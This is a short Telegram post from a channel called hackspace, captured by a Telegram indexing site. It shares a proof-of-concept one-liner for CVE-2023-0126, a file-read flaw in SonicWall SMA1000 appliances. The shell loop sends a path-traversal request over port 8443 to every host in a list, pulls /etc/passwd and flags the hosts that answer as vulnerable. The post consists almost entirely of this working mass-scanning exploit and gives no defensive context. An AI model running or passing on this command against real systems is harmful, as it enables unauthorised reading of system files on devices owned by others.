TGTGInsighttelegram intelligenceLIVE / telegram public index
← hackspace
hackspace avatar

TGINSIGHT POST

Post #1029

@hackspace

hackspace

Views47Post view count
PostedOct 1110/11/2023, 11:43 AM
Post content

Post content

CVE-2023-0126 SonicWall SMA1000 File Read Bug POC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done